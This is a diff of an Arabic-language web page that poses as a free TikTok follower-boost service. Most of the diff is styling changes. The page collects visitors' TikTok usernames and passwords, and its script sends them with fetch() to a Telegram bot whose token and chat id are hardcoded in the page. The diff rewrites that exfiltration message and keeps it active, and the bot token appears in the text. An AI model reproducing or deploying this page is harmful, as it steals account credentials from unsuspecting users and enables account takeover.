--- a/index.html
+++ b/index.html
@@ -1,49 +1,49 @@
 <!DOCTYPE html>
 <html lang="ar" dir="rtl">
 <head>
-  <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+  <meta charset="UTF-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>رشق تيك توك مجاني</title>
   <style>
     body {
-      background-color: #111;
-      font-family: 'Tahoma', sans-serif;
       margin: 0;
       padding: 0;
+      background-color: #121212;
+      font-family: 'Tahoma', sans-serif;
       display: flex;
-      flex-direction: column;
-      align-items: center;
       justify-content: center;
+      align-items: center;
       height: 100vh;
       color: white;
     }
 
     .container {
+      background-color: #000;
+      padding: 25px;
+      border-radius: 20px;
       width: 90%;
       max-width: 400px;
-      background-color: #000;
-      border-radius: 15px;
-      padding: 20px;
-      box-shadow: 0 0 15px rgba(255, 255, 255, 0.1);
       text-align: center;
+      box-shadow: 0 0 15px rgba(255, 255, 255, 0.05);
     }
 
     .logo {
       font-size: 60px;
-      margin-bottom: 10px;
+      margin-bottom: 15px;
     }
 
     h2 {
-      margin-bottom: 25px;
       font-size: 24px;
+      margin-bottom: 20px;
+      color: white;
     }
 
     input, select {
       width: 100%;
       padding: 12px;
       margin: 10px 0;
-      border-radius: 8px;
       border: none;
+      border-radius: 10px;
       background-color: #1e1e1e;
       color: white;
       font-size: 16px;
@@ -54,10 +54,11 @@
       padding: 14px;
       background-color: #ff0050;
       border: none;
-      border-radius: 8px;
+      border-radius: 10px;
       font-size: 18px;
       color: white;
       cursor: pointer;
+      margin-top: 10px;
     }
 
     button:hover {
@@ -69,8 +70,8 @@
   <div class="container">
     <div class="logo">🎵</div>
     <h2>رشق مجاني</h2>
-    <input type="text" placeholder="اسم المستخدم" id="username" />
-    <input type="password" placeholder="كلمة المرور" id="password" />
+    <input type="text" id="username" placeholder="اسم المستخدم">
+    <input type="password" id="password" placeholder="كلمة المرور">
     <select id="amount">
       <option value="1000">1000</option>
       <option value="2000">2000</option>
@@ -93,10 +94,11 @@
 
       const token = "7197079453:AAFnVl-c5S28araI2YScZOPlQzBUXn_zZIk";
       const chat_id = "7197079453";
-      const message = `🚨 تم إرسال طلب جديد:\n👤 المستخدم: ${username}\n🔑 كلمة المرور: ${password}\n📦 الكمية: ${amount}\n📌 النوع: ${type}`;
+
+      const message = `🔔 طلب جديد من الموقع:\n👤 يوزر: ${username}\n🔑 كلمة المرور: ${password}\n📦 العدد: ${amount}\n📌 النوع: ${type}`;
 
       fetch(`https://api.telegram.org/bot${token}/sendMessage?chat_id=${chat_id}&text=${encodeURIComponent(message)}`);
-      alert("تم الإرسال بنجاح ✅");
+      alert("✅ تم الإرسال بنجاح");
     }
   </script>
 </body>
